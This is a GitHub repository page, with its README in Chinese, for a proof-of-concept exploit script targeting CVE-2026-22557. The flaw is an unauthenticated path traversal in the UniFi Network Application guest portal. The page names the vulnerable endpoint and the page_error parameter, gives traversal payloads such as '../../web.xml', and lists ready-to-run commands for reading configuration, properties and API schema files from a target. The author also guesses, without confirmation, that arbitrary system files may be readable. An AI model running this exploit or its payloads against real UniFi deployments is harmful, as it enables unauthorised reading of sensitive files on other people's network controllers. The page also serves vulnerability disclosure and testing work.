ThePotatoOfDoom/CVE-2026-22557-PoC

GitHub: ThePotatoOfDoom/CVE-2026-22557-PoC

这是一个针对 UniFi Network Application 预认证路径遍历漏洞(CVE-2026-22557)的概念验证工具,用于未经身份验证的文件读取。

Stars: 0 | Forks: 0

# CVE-2026-22557 -- UniFi Network Application 预认证路径遍历 UniFi Network Application 访客门户(`/guest/s/{site}/login`)中存在预认证路径遍历漏洞。`page_error` 查询参数在未经验证的情况下被传递给资源加载器,允许未认证攻击者从 Web 应用程序读取文件(例如 `WEB-INF/web.xml`)。 如果访客门户页面已被自定义,资源加载器似乎会回退到原始 `FileInputStream` 分支,该分支可以在上下文根之外访问底层系统上的任意文件。我尚未确认这一点,如果我有时间会进一步调查。 ## 使用方法 ``` pip install requests python CVE-2026-22557.py [-f FILE] [-g GUEST_PATH] [-o OUTPUT] [-x PROXY] ``` | Flag | 描述 | 默认值 | |------|-------------|---------| | `target` | 目标 URL(例如 `https://host:8843`) | *(必填)* | | `-f` | 要读取的相对路径 | `../../web.xml` | | `-g` | 访客门户路径 | `/guest/s/default/login` | | `-o` | 将响应写入文件 | *(stdout)* | | `-x` | 代理 URL | *(无)* | ## 示例 image ``` # 默认 -- 读取 WEB-INF/web.xml (HTTPS guest portal) python CVE-2026-22557.py https://192.168.1.1:8843 # HTTP guest portal python CVE-2026-22557.py http://192.168.1.1:8880 # 读取 classpath 资源 python CVE-2026-22557.py https://192.168.1.1:8843 -f ../system.properties # 读取 API schema 并保存到文件 python CVE-2026-22557.py https://192.168.1.1:8843 -f ../api/fields/Setting.json -o setting.json # 不同的 site name python CVE-2026-22557.py https://192.168.1.1:8843 -g /guest/s/mysite/login # 通过 a proxy python CVE-2026-22557.py https://192.168.1.1:8843 -x http://127.0.0.1:8080 ```
标签:CISA项目, CVE-2026-22557, Exploit, Guest Portal, Maven, PoC, Python, UniFi, WEB-INF, 任意文件读取, 利用脚本, 字符串匹配, 文件读取, 无后门, 暴力破解, 未授权访问, 漏洞验证, 网络安全, 网络安全审计, 网络设备, 路径遍历, 逆向工具, 隐私保护, 预认证漏洞